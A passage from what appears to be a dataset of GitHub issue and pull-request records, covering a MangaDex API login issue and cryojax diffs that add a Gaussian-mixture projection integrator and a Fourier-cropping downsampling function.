and if It <i>is</is> a problem with the official api, is there any other way of getting my reading lists?
| Hello, seems that the current method for login has been deprecated, and we need to migrate to the new OAuth2 login system. I will investigate further how to implement it. For getting the reading lists, unfortunately, there is no way to get a user's manga library without being on a public reading list.
Hello again, can you retry the login? As I was debugging I couldn't replicate the issue (the migration to OAuth will still happen) as the endpoint seems to be up still. Can you include which version of the library you are using?
Hello, thanks for looking into it!
I'm on version 2.5.2 of the wrapper.
I confirmed the error is still present, and i tried to login with another account only to get the same result.
Ahh for additional info, I <i>did</i> try asking in the mangadex forum on reddit and this is the info I got :

here's the [link](https://www.reddit.com/r/mangadex/comments/12dilc7/is_the_authentication_endpoints_in_the_mangadex/) to the discussion
Do you think it might be because of regional differences?
Hi, I found this on the MangaDex discord:

That might answer your question, and might be why it wasn't repeatable during debugging.
Oh so that was the reason huh. Thanks a lot for that! I figured out how to login with the bearer text but it was pretty inefficient, and using selenium is gonna make my program a lot slower and bulkier...guess I'll wait for OAuth to be implemented. It ain't implemented yet right? Where can I find out if it got implemented?
Sorry for the very late response, I've been attending some IRL matters and couldn't dedicate much time to the followup in this issue.
I came across a quite old announcement in the discord server that the oauth is still in the dev phase, however, I'm not sure if this contains up to date user data as from my understanding is just for testing the integration
<img width="847" alt="image" src="https://github.com/EMACC99/mangadex/assets/50022572/e42e2b80-c83e-4b66-a1b9-6a4134f122d7">
(yes, I use discord in light mode, sorry if it burned your eyes)
As you saw in your investigation, there is not a way to register a third-party client right now so our only hope is that the .dev has everything we need for the new account authentications, but I'm not sure about the reliability of using it for every login or just using it for the accounts that are in a case similar to yours. If anyone have an idea on how to approach this, you're more than welcome to share it.
| 2023-12-26T10:55:39 | 0.0 | [] | [] |
||
mjo22/cryojax | mjo22__cryojax-227 | c2faf8cf93bf3c4ae33350cf0f75d700fef46972 | diff --git a/.github/workflows/build_docs.yml b/.github/workflows/build_docs.yml
index a4f52b91..91b16c73 100644
--- a/.github/workflows/build_docs.yml
+++ b/.github/workflows/build_docs.yml
@@ -27,7 +27,7 @@ jobs:
pip install mkdocs-same-dir
pip install pymdown-extensions
pip install mkdocs-pymdownx-material-extras
- pip install mkdocs-autorefs
+ pip install mkdocs-autorefs
pip install mkdocs-simple-plugin
pip install mkdocstrings-python
pip install mknotebooks
diff --git a/.gitignore b/.gitignore
index e5d325b0..e19058ba 100644
--- a/.gitignore
+++ b/.gitignore
@@ -7,4 +7,4 @@
build/
dist/
site/
-__pycache__
\ No newline at end of file
+__pycache__
diff --git a/docs/_static/custom_css.css b/docs/_static/custom_css.css
index 6e414d34..c8500ddd 100644
--- a/docs/_static/custom_css.css
+++ b/docs/_static/custom_css.css
@@ -150,4 +150,4 @@ h5.doc-heading, h6.heading {
background-color: var(--doc-heading-color-alt);
border-radius: 2pt;
padding: 0pt 5pt 2pt 5pt;
-}
\ No newline at end of file
+}
diff --git a/docs/_static/mathjax.js b/docs/_static/mathjax.js
index 097eaafb..c20d5fdb 100644
--- a/docs/_static/mathjax.js
+++ b/docs/_static/mathjax.js
@@ -10,12 +10,12 @@ window.MathJax = {
processHtmlClass: "arithmatex"
}
};
-
- document$.subscribe(() => {
-
-
+
+ document$.subscribe(() => {
+
+
MathJax.startup.output.clearCache()
MathJax.typesetClear()
MathJax.texReset()
MathJax.typesetPromise()
- })
\ No newline at end of file
+ })
diff --git a/docs/examples/data/ribosome_4ug0_particles.star b/docs/examples/data/ribosome_4ug0_particles.star
index b2e183e1..7d1f1a21 100644
--- a/docs/examples/data/ribosome_4ug0_particles.star
+++ b/docs/examples/data/ribosome_4ug0_particles.star
@@ -3,43 +3,42 @@
data_optics
-loop_
-_rlnOpticsGroupName #1
-_rlnOpticsGroup #2
-_rlnMicrographOriginalPixelSize #3
-_rlnVoltage #4
-_rlnSphericalAberration #5
-_rlnAmplitudeContrast #6
-_rlnImagePixelSize #7
-_rlnImageSize #8
-_rlnImageDimensionality #9
-_rlnCtfDataAreCtfPremultiplied #10
-opticsGroup1 1 4.000000 300.000000 2.700000 0.100000 4.000000 100 2 0
-
+loop_
+_rlnOpticsGroupName #1
+_rlnOpticsGroup #2
+_rlnMicrographOriginalPixelSize #3
+_rlnVoltage #4
+_rlnSphericalAberration #5
+_rlnAmplitudeContrast #6
+_rlnImagePixelSize #7
+_rlnImageSize #8
+_rlnImageDimensionality #9
+_rlnCtfDataAreCtfPremultiplied #10
+opticsGroup1 1 4.000000 300.000000 2.700000 0.100000 4.000000 100 2 0
+
# version 30001
data_particles
-loop_
-_rlnCoordinateX #1
-_rlnCoordinateY #2
-_rlnAnglePsi #3
-_rlnAutopickFigureOfMerit #4
-_rlnImageName #5
-_rlnMicrographName #6
-_rlnOpticsGroup #7
-_rlnCtfMaxResolution #8
-_rlnCtfFigureOfMerit #9
-_rlnDefocusU #10
-_rlnDefocusV #11
-_rlnDefocusAngle #12
-_rlnCtfBfactor #13
-_rlnCtfScalefactor #14
-_rlnPhaseShift #15
- 790.000000 817.000000 -999.00000 -999.00000 000001@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
- 669.000000 148.000000 -999.00000 -999.00000 000002@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
- 1173.000000 270.000000 -999.00000 -999.00000 000003@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
- 465.000000 260.000000 -999.00000 -999.00000 000004@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
- 1039.000000 702.000000 -999.00000 -999.00000 000005@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
-
+loop_
+_rlnCoordinateX #1
+_rlnCoordinateY #2
+_rlnAnglePsi #3
+_rlnAutopickFigureOfMerit #4
+_rlnImageName #5
+_rlnMicrographName #6
+_rlnOpticsGroup #7
+_rlnCtfMaxResolution #8
+_rlnCtfFigureOfMerit #9
+_rlnDefocusU #10
+_rlnDefocusV #11
+_rlnDefocusAngle #12
+_rlnCtfBfactor #13
+_rlnCtfScalefactor #14
+_rlnPhaseShift #15
+ 790.000000 817.000000 -999.00000 -999.00000 000001@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
+ 669.000000 148.000000 -999.00000 -999.00000 000002@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
+ 1173.000000 270.000000 -999.00000 -999.00000 000003@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
+ 465.000000 260.000000 -999.00000 -999.00000 000004@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
+ 1039.000000 702.000000 -999.00000 -999.00000 000005@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
diff --git a/src/cryojax/image/__init__.py b/src/cryojax/image/__init__.py
index df8247c9..8970e863 100644
--- a/src/cryojax/image/__init__.py
+++ b/src/cryojax/image/__init__.py
@@ -1,6 +1,7 @@
from . import operators as operators
from ._average import radial_average as radial_average
from ._downsample import (
+ downsample_to_shape_with_fourier_cropping as downsample_to_shape_with_fourier_cropping, # noqa: E501
downsample_with_fourier_cropping as downsample_with_fourier_cropping,
)
from ._edges import (
diff --git a/src/cryojax/image/_downsample.py b/src/cryojax/image/_downsample.py
index 1ed4b9f1..8fc3e42e 100644
--- a/src/cryojax/image/_downsample.py
+++ b/src/cryojax/image/_downsample.py
@@ -7,12 +7,14 @@
from jaxtyping import Array, Inexact
from ._edges import crop_to_shape
+from ._fft import fftn, ifftn
@overload
def downsample_with_fourier_cropping(
image_or_volume: Inexact[Array, "_ _ _"],
downsampling_factor: float | int,
+ get_real: bool = True,
) -> Inexact[Array, "_ _ _"]: ...
@@ -20,20 +22,25 @@ def downsample_with_fourier_cropping(
def downsample_with_fourier_cropping(
image_or_volume: Inexact[Array, "_ _"],
downsampling_factor: float | int,
+ get_real: bool = True,
) -> Inexact[Array, "_ _"]: ...
def downsample_with_fourier_cropping(
image_or_volume: Inexact[Array, "_ _"] | Inexact[Array, "_ _ _"],
downsampling_factor: float | int,
+ get_real: bool = True,
) -> Inexact[Array, "_ _"] | Inexact[Array, "_ _ _"]:
"""Downsample an array using fourier cropping.
**Arguments:**
- `image_or_volume`: The image or volume array to downsample.
- - `downsample_factor`: A scale factor at which to downsample `image_or_volume`
- by. Must be a value greater than `1`.
+ - `downsample_factor`:
+ A scale factor at which to downsample `image_or_volume`
+ by. Must be a value greater than `1`.
+ - `get_real`:
+ If `False`, the `image_or_volume` is returned in fourier space.
**Returns:**
@@ -49,7 +56,9 @@ def downsample_with_fourier_cropping(
int(image.shape[0] / downsampling_factor),
int(image.shape[1] / downsampling_factor),
)
- downsampled_array = _downsample_array_to_shape(image, new_shape)
+ downsampled_array = downsample_to_shape_with_fourier_cropping(
+ image, new_shape, get_real=get_real
+ )
elif image_or_volume.ndim == 3:
volume = image_or_volume
new_shape = (
@@ -57,25 +66,71 @@ def downsample_with_fourier_cropping(
int(volume.shape[1] / downsampling_factor),
int(volume.shape[2] / downsampling_factor),
)
- downsampled_array = _downsample_array_to_shape(volume, new_shape)
+ downsampled_array = downsample_to_shape_with_fourier_cropping(
+ volume, new_shape, get_real=get_real
+ )
else:
raise ValueError(
"`downsample_with_fourier_cropping` can only crop images and volumes. "
f"Got an array with number of dimensions {image_or_volume.ndim}."
)
- return (
- downsampled_array.real
- if jnp.issubdtype(image_or_volume.dtype, jnp.floating)
- else downsampled_array
- )
+ if get_real:
+ return (
+ downsampled_array.real
+ if jnp.issubdtype(image_or_volume.dtype, jnp.floating)
+ else downsampled_array
+ )
+ else:
+ return downsampled_array
+
+
+@overload
+def downsample_to_shape_with_fourier_cropping(
+ image_or_volume: Inexact[Array, "_ _"],
+ downsampled_shape: tuple[int, int],
+ get_real: bool = True,
+) -> Inexact[Array, "_ _"]: ...
+
+
+@overload
+def downsample_to_shape_with_fourier_cropping(
+ image_or_volume: Inexact[Array, "_ _ _"],
+ downsampled_shape: tuple[int, int, int],
+ get_real: bool = True,
+) -> Inexact[Array, "_ _ _"]: ...
-def _downsample_array_to_shape(array, new_shape):
- n_pixels, new_n_pixels = array.size, math.prod(new_shape)
- fourier_array = jnp.fft.fftshift(jnp.fft.fftn(array))
+def downsample_to_shape_with_fourier_cropping(
+ image_or_volume: Inexact[Array, "_ _"] | Inexact[Array, "_ _ _"],
+ downsampled_shape: tuple[int, int] | tuple[int, int, int],
+ get_real: bool = True,
+) -> Inexact[Array, "_ _"] | Inexact[Array, "_ _ _"]:
+ """Downsample an array to a specified shape using fourier cropping.
+
+ **Arguments:**
+
+ - `image_or_volume`: The image or volume array to downsample.
+ - `downsampled_shape`:
+ The new shape after fourier cropping.
+ - `get_real`:
+ If `False`, the `image_or_volume` is returned in fourier space.
+
+ **Returns:**
+
+ The downsampled `image_or_volume`, at the new real-space shape
+ `downsampled_shape`. If `get_real = False`, return
+ the downsampled array in fourier space assuming hermitian symmetry,
+ with the zero frequency component in the corner.
+ """
+ n_pixels, new_n_pixels = image_or_volume.size, math.prod(downsampled_shape)
+ fourier_array = jnp.fft.fftshift(fftn(image_or_volume))
cropped_fourier_array = (new_n_pixels / n_pixels) * crop_to_shape(
- fourier_array, new_shape
+ fourier_array, downsampled_shape
)
- downsampled_array = jnp.fft.ifftn(jnp.fft.ifftshift(cropped_fourier_array))
- return downsampled_array
+ if get_real:
+ return ifftn(jnp.fft.ifftshift(cropped_fourier_array))
+ else:
+ return jnp.fft.ifftshift(cropped_fourier_array)[
+ ..., : downsampled_shape[-1] // 2 + 1
+ ]
diff --git a/src/cryojax/image/_map_coordinates.py b/src/cryojax/image/_map_coordinates.py
index e81da9d1..71f618da 100644
--- a/src/cryojax/image/_map_coordinates.py
+++ b/src/cryojax/image/_map_coordinates.py
@@ -97,8 +97,9 @@ def _map_coordinates_nn_or_linear(
if len(coordinates) != input_arr.ndim:
raise ValueError(
- "coordinates must be a sequence of length input.ndim, but "
- "{} != {}".format(len(coordinates), input_arr.ndim)
+ "coordinates must be a sequence of length input.ndim, but " "{} != {}".format(
+ len(coordinates), input_arr.ndim
+ )
)
if order == 0:
diff --git a/src/cryojax/io/_gemmi.py b/src/cryojax/io/_gemmi.py
index 97eb3ec8..0391bd4a 100644
--- a/src/cryojax/io/_gemmi.py
+++ b/src/cryojax/io/_gemmi.py
@@ -48,11 +48,26 @@ def clean_gemmi_structure(structure):
Same object, cleaned up of unnecessary atoms.
"""
- structure.remove_alternative_conformations()
- structure.remove_hydrogens()
- structure.remove_waters()
- structure.remove_ligands_and_waters()
- structure.remove_empty_chains()
+ try:
+ structure.remove_alternative_conformations()
+ except RuntimeError:
+ Warning("Alternative conformations could not be removed.")
+ try:
+ structure.remove_hydrogens()
+ except RuntimeError:
+ Warning("Hydrogens could not be removed.")
+ try:
+ structure.remove_waters()
+ except RuntimeError:
+ Warning("Waters could not be removed.")
+ try:
+ structure.remove_ligands_and_waters()
+ except RuntimeError:
+ Warning("Ligands and waters could not be removed.")
+ try:
+ structure.remove_empty_chains()
+ except RuntimeError:
+ Warning("Empty chains could not be removed.")
return structure
@@ -142,7 +157,7 @@ def extract_atom_positions_and_numbers(
return positions, atomic_numbers
-def extract_atom_b_factors(atoms) -> Float[np.ndarray, "N 3"]:
+def extract_atom_b_factors(atoms) -> Float[np.ndarray, " N"]:
"""
Interpret Gemmi atoms and extract a single parameter type.
diff --git a/src/cryojax/simulator/__init__.py b/src/cryojax/simulator/__init__.py
index 39c4d137..39c270c1 100644
--- a/src/cryojax/simulator/__init__.py
+++ b/src/cryojax/simulator/__init__.py
@@ -30,6 +30,7 @@
AbstractPotentialIntegrator as AbstractPotentialIntegrator,
AbstractVoxelPotentialIntegrator as AbstractVoxelPotentialIntegrator,
FourierSliceExtraction as FourierSliceExtraction,
+ GaussianMixtureProjection as GaussianMixtureProjection,
NufftProjection as NufftProjection,
)
from ._potential_representation import (
diff --git a/src/cryojax/simulator/_potential_integrator/__init__.py b/src/cryojax/simulator/_potential_integrator/__init__.py
index c1067e68..6085fa52 100644
--- a/src/cryojax/simulator/_potential_integrator/__init__.py
+++ b/src/cryojax/simulator/_potential_integrator/__init__.py
@@ -1,3 +1,6 @@
+from .atom_potential_integrator import (
+ GaussianMixtureProjection as GaussianMixtureProjection,
+)
from .base_potential_integrator import (
AbstractPotentialIntegrator as AbstractPotentialIntegrator,
AbstractVoxelPotentialIntegrator as AbstractVoxelPotentialIntegrator,
diff --git a/src/cryojax/simulator/_potential_integrator/atom_potential_integrator.py b/src/cryojax/simulator/_potential_integrator/atom_potential_integrator.py
new file mode 100644
index 00000000..d0134a73
--- /dev/null
+++ b/src/cryojax/simulator/_potential_integrator/atom_potential_integrator.py
@@ -0,0 +1,156 @@
+from typing import Optional
+from typing_extensions import override
+
+import jax
+import jax.numpy as jnp
+from jaxtyping import Array, Complex, Float
+
+from ...coordinates import make_1d_coordinate_grid
+from ...image import downsample_to_shape_with_fourier_cropping, rfftn
+from .._instrument_config import InstrumentConfig
+from .._potential_representation import (
+ GaussianMixtureAtomicPotential,
+ PengAtomicPotential,
+)
+from .base_potential_integrator import AbstractPotentialIntegrator
+
+
+class GaussianMixtureProjection(
+ AbstractPotentialIntegrator[GaussianMixtureAtomicPotential | PengAtomicPotential],
+ strict=True,
+):
+ upsampling_factor: Optional[int]
+
+ def __init__(self, *, upsampling_factor: Optional[int] = None):
+ """**Arguments:**
+
+ - `upsampling_factor`:
+ The factor by which to upsample the computation of the images.
+ If `upsampling_factor` is greater than 1, the images will be computed
+ at a higher resolution and then downsampled to the original resolution.
+ This can be useful for reducing aliasing artifacts in the images.
+ """ # noqa: E501
+ self.upsampling_factor = upsampling_factor
+
+ def __check_init__(self):
+ if self.upsampling_factor is not None and self.upsampling_factor < 1:
+ raise AttributeError(
+ "`GaussianMixtureProjection.upsampling_factor` must "
+ f"be greater than `1`. Got a value of {self.upsampling_factor}."
+ )
+
+ @override
+ def compute_fourier_integrated_potential(
+ self,
+ potential: GaussianMixtureAtomicPotential | PengAtomicPotential,
+ instrument_config: InstrumentConfig,
+ ) -> Complex[
+ Array, "{instrument_config.padded_y_dim} {instrument_config.padded_x_dim//2+1}"
+ ]:
+ """Compute a projection from the atomic potential and transform it to Fourier space
+
+ **Arguments:**
+
+ - `potential`: The atomic potential to project.
+ - `instrument_config`: The configuration of the imaging instrument.
+
+ **Returns:**
+
+ The Fourier transform of the integrated potential.
+ """ # noqa: E501
+
+ if self.upsampling_factor is not None:
+ pixel_size = instrument_config.pixel_size / self.upsampling_factor
+ shape = (
+ instrument_config.padded_y_dim * self.upsampling_factor,
+ instrument_config.padded_x_dim * self.upsampling_factor,
+ )
+ else:
+ pixel_size = instrument_config.pixel_size
+ shape = instrument_config.padded_shape
+
+ grid_x = make_1d_coordinate_grid(shape[1], pixel_size)
+ grid_y = make_1d_coordinate_grid(shape[0], pixel_size)
+
+ if isinstance(potential, PengAtomicPotential):
+ if potential.b_factors is None:
+ gaussian_widths = potential.scattering_factor_b
+ else:
+ gaussian_widths = (
+ potential.scattering_factor_b + potential.b_factors[:, None]
+ )
+
+ gaussian_amplitudes = potential.scattering_factor_a
+
+ elif isinstance(potential, GaussianMixtureAtomicPotential):
+ gaussian_amplitudes = potential.gaussian_strengths
+ gaussian_widths = potential.gaussian_widths
+
+ else:
+ raise ValueError(
+ "Supported types for `potential` are `PengAtomicPotential` and "
+ " `GaussianMixtureAtomicPotential`."
+ )
+
+ projection = _evaluate_2d_real_space_gaussian(
+ grid_x, grid_y, potential.atom_positions, gaussian_amplitudes, gaussian_widths
+ )
+
+ if self.upsampling_factor is not None:
+ fourier_projection = downsample_to_shape_with_fourier_cropping(
+ projection,
+ downsampled_shape=instrument_config.padded_shape,
+ get_real=False,
+ )
+ else:
+ fourier_projection = rfftn(projection)
+
+ return fourier_projection
+
+
[email protected]
+def _evaluate_2d_real_space_gaussian(
+ grid_x: Float[Array, " x_dim"],
+ grid_y: Float[Array, " y_dim"],
+ atom_positions: Float[Array, "n_atoms 3"],
+ a: Float[Array, "n_atoms n_gaussians_per_atom"],
+ b: Float[Array, "n_atoms n_gaussians_per_atom"],
+) -> Float[Array, "y_dim x_dim"]:
+ """Evaluate a gaussian on a 3D grid.
+
+ **Arguments:**
+
+ - `grid_x`: The x-coordinates of the grid.
+ - `grid_y`: The y-coordinates of the grid.
+ - `pos`: The center of the gaussian.
+ - `a`: A scale factor.
+ - `b`: The scale of the gaussian.
+
+ **Returns:**
+
+ The potential of the gaussian on the grid.
+ """
+
+ b_inverse = 4.0 * jnp.pi / b
+
+ gauss_x = (
+ jnp.exp(
+ -jnp.pi
+ * b_inverse[None, :, :]
+ * ((grid_x[:, None] - atom_positions.T[0, :]) ** 2)[:, :, None]
+ )
+ * a[None, :, :]
+ * b_inverse[None, :, :]
+ )
+ gauss_y = jnp.exp(
+ -jnp.pi
+ * b_inverse[None, :, :]
+ * ((grid_y[:, None] - atom_positions.T[1, :]) ** 2)[:, :, None]
+ )
+
+ gauss_x = jnp.transpose(gauss_x, (2, 1, 0))
+ gauss_y = jnp.transpose(gauss_y, (2, 0, 1))
+
+ image = 4 * jnp.pi * jnp.sum(jnp.matmul(gauss_y, gauss_x), axis=0)
+
+ return image
| Implement integrator that simulates an image from an atom potential directly
| In order to do this, we would just have to make a subclass of the `cryojax.simulator.AbstractPotentialIntegrator`, and then we could write something like
```python
from typing_extensions import override
from jaxtyping import Array, Complex
from cryojax.image import rfftn
class GaussianMixtureProjection(AbstractPotentialIntegrator[GaussianMixtureAtomicPotential | PengAtomicPotential], strict=True):
def __init__(...):
# Initialize any parameters for the algorithm we want to be able to tune
@override
def compute_fourier_integrated_potential(potential: GaussianMixtureAtomicPotential | PengAtomicPotential, instrument_config: InstrumentConfig) -> Complex[Array, '{instrument_config.padded_y_dim} {instrument_config.padded_x_dim//2+1}']:
# Grab information from the `instrument_config` like the `instrument_config.pixel_size` and
# `instrument_config.padded_shape` and do some things
...
# Compute the projection in real space, assuming that the `potential` is already at the rotation
# we want
projection = ...
# Go to fourier space in cryojax's conventions
return rfftn(projection)
```
Then this should work with everything in cryojax!
A few implementation points
- Maybe the `__init__` should take in a parameter that specifies how much to upsample the image? Then we can do fourier cropping before returning the image. This would be a candidate for something that would belong in an abstract base class (but it wouldn’t be necessary to do this)
- We should analytically work out the projection integral, starting with the expression in the docs for `PengAtomicPotential.as_real_voxel_grid`. I think we will pick up some kind of pre-factor from the integration, which will make sure we have things in the right units
> We should analytically work out the projection integral, starting with the expression in the docs for PengAtomicPotential.as_real_voxel_grid. I think we will pick up some kind of pre-factor from the integration, which will make sure we have things in the right units
It simply changes the b^(3/2) to b
Ah of course that’s right! | 2024-05-17T20:38:24 | 0.0 | [] | [] |
||
mjo22/cryojax | mjo22__cryojax-225 | c2faf8cf93bf3c4ae33350cf0f75d700fef46972 | diff --git a/.github/workflows/build_docs.yml b/.github/workflows/build_docs.yml
index a4f52b91..91b16c73 100644
--- a/.github/workflows/build_docs.yml
+++ b/.github/workflows/build_docs.yml
@@ -27,7 +27,7 @@ jobs:
pip install mkdocs-same-dir
pip install pymdown-extensions
pip install mkdocs-pymdownx-material-extras
- pip install mkdocs-autorefs
+ pip install mkdocs-autorefs
pip install mkdocs-simple-plugin
pip install mkdocstrings-python
pip install mknotebooks
diff --git a/.gitignore b/.gitignore
index e5d325b0..e19058ba 100644
--- a/.gitignore
+++ b/.gitignore
@@ -7,4 +7,4 @@
build/
dist/
site/
-__pycache__
\ No newline at end of file
+__pycache__
diff --git a/docs/_static/custom_css.css b/docs/_static/custom_css.css
index 6e414d34..c8500ddd 100644
--- a/docs/_static/custom_css.css
+++ b/docs/_static/custom_css.css
@@ -150,4 +150,4 @@ h5.doc-heading, h6.heading {
background-color: var(--doc-heading-color-alt);
border-radius: 2pt;
padding: 0pt 5pt 2pt 5pt;
-}
\ No newline at end of file
+}
diff --git a/docs/_static/mathjax.js b/docs/_static/mathjax.js
index 097eaafb..c20d5fdb 100644
--- a/docs/_static/mathjax.js
+++ b/docs/_static/mathjax.js
@@ -10,12 +10,12 @@ window.MathJax = {
processHtmlClass: "arithmatex"
}
};
-
- document$.subscribe(() => {
-
-
+
+ document$.subscribe(() => {
+
+
MathJax.startup.output.clearCache()
MathJax.typesetClear()
MathJax.texReset()
MathJax.typesetPromise()
- })
\ No newline at end of file
+ })
diff --git a/docs/examples/data/ribosome_4ug0_particles.star b/docs/examples/data/ribosome_4ug0_particles.star
index b2e183e1..7d1f1a21 100644
--- a/docs/examples/data/ribosome_4ug0_particles.star
+++ b/docs/examples/data/ribosome_4ug0_particles.star
@@ -3,43 +3,42 @@
data_optics
-loop_
-_rlnOpticsGroupName #1
-_rlnOpticsGroup #2
-_rlnMicrographOriginalPixelSize #3
-_rlnVoltage #4
-_rlnSphericalAberration #5
-_rlnAmplitudeContrast #6
-_rlnImagePixelSize #7
-_rlnImageSize #8
-_rlnImageDimensionality #9
-_rlnCtfDataAreCtfPremultiplied #10
-opticsGroup1 1 4.000000 300.000000 2.700000 0.100000 4.000000 100 2 0
-
+loop_
+_rlnOpticsGroupName #1
+_rlnOpticsGroup #2
+_rlnMicrographOriginalPixelSize #3
+_rlnVoltage #4
+_rlnSphericalAberration #5
+_rlnAmplitudeContrast #6
+_rlnImagePixelSize #7
+_rlnImageSize #8
+_rlnImageDimensionality #9
+_rlnCtfDataAreCtfPremultiplied #10
+opticsGroup1 1 4.000000 300.000000 2.700000 0.100000 4.000000 100 2 0
+
# version 30001
data_particles
-loop_
-_rlnCoordinateX #1
-_rlnCoordinateY #2
-_rlnAnglePsi #3
-_rlnAutopickFigureOfMerit #4
-_rlnImageName #5
-_rlnMicrographName #6
-_rlnOpticsGroup #7
-_rlnCtfMaxResolution #8
-_rlnCtfFigureOfMerit #9
-_rlnDefocusU #10
-_rlnDefocusV #11
-_rlnDefocusAngle #12
-_rlnCtfBfactor #13
-_rlnCtfScalefactor #14
-_rlnPhaseShift #15
- 790.000000 817.000000 -999.00000 -999.00000 000001@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
- 669.000000 148.000000 -999.00000 -999.00000 000002@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
- 1173.000000 270.000000 -999.00000 -999.00000 000003@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
- 465.000000 260.000000 -999.00000 -999.00000 000004@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
- 1039.000000 702.000000 -999.00000 -999.00000 000005@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
-
+loop_
+_rlnCoordinateX #1
+_rlnCoordinateY #2
+_rlnAnglePsi #3
+_rlnAutopickFigureOfMerit #4
+_rlnImageName #5
+_rlnMicrographName #6
+_rlnOpticsGroup #7
+_rlnCtfMaxResolution #8
+_rlnCtfFigureOfMerit #9
+_rlnDefocusU #10
+_rlnDefocusV #11
+_rlnDefocusAngle #12
+_rlnCtfBfactor #13
+_rlnCtfScalefactor #14
+_rlnPhaseShift #15
+ 790.000000 817.000000 -999.00000 -999.00000 000001@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
+ 669.000000 148.000000 -999.00000 -999.00000 000002@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
+ 1173.000000 270.000000 -999.00000 -999.00000 000003@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
+ 465.000000 260.000000 -999.00000 -999.00000 000004@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
+ 1039.000000 702.000000 -999.00000 -999.00000 000005@data/ribosome_4ug0_micrograph.mrcs data/ribosome_4ug0_micrograph.mrc 1 5.657459 0.138196 10050.969727 9999.999023 -54.58706 0.000000 1.000000 0.000000
diff --git a/src/cryojax/image/_map_coordinates.py b/src/cryojax/image/_map_coordinates.py
index e81da9d1..71f618da 100644
--- a/src/cryojax/image/_map_coordinates.py
+++ b/src/cryojax/image/_map_coordinates.py
@@ -97,8 +97,9 @@ def _map_coordinates_nn_or_linear(
if len(coordinates) != input_arr.ndim:
raise ValueError(
- "coordinates must be a sequence of length input.ndim, but "
- "{} != {}".format(len(coordinates), input_arr.ndim)
+ "coordinates must be a sequence of length input.ndim, but " "{} != {}".format(
+ len(coordinates), input_arr.ndim
+ )
)
if order == 0:
diff --git a/src/cryojax/io/_gemmi.py b/src/cryojax/io/_gemmi.py
index 97eb3ec8..0391bd4a 100644
--- a/src/cryojax/io/_gemmi.py
+++ b/src/cryojax/io/_gemmi.py
@@ -48,11 +48,26 @@ def clean_gemmi_structure(structure):
Same object, cleaned up of unnecessary atoms.
"""
- structure.remove_alternative_conformations()
- structure.remove_hydrogens()
- structure.remove_waters()
- structure.remove_ligands_and_waters()
- structure.remove_empty_chains()
+ try:
+ structure.remove_alternative_conformations()
+ except RuntimeError:
+ Warning("Alternative conformations could not be removed.")
+ try:
+ structure.remove_hydrogens()
+ except RuntimeError:
+ Warning("Hydrogens could not be removed.")
+ try:
+ structure.remove_waters()
+ except RuntimeError:
+ Warning("Waters could not be removed.")
+ try:
+ structure.remove_ligands_and_waters()
+ except RuntimeError:
+ Warning("Ligands and waters could not be removed.")
+ try:
+ structure.remove_empty_chains()
+ except RuntimeError:
+ Warning("Empty chains could not be removed.")
return structure
@@ -142,7 +157,7 @@ def extract_atom_positions_and_numbers(
return positions, atomic_numbers
-def extract_atom_b_factors(atoms) -> Float[np.ndarray, "N 3"]:
+def extract_atom_b_factors(atoms) -> Float[np.ndarray, " N"]:
"""
Interpret Gemmi atoms and extract a single parameter type.
diff --git a/src/cryojax/simulator/__init__.py b/src/cryojax/simulator/__init__.py
index 39c4d137..39c270c1 100644
--- a/src/cryojax/simulator/__init__.py
+++ b/src/cryojax/simulator/__init__.py
@@ -30,6 +30,7 @@
AbstractPotentialIntegrator as AbstractPotentialIntegrator,
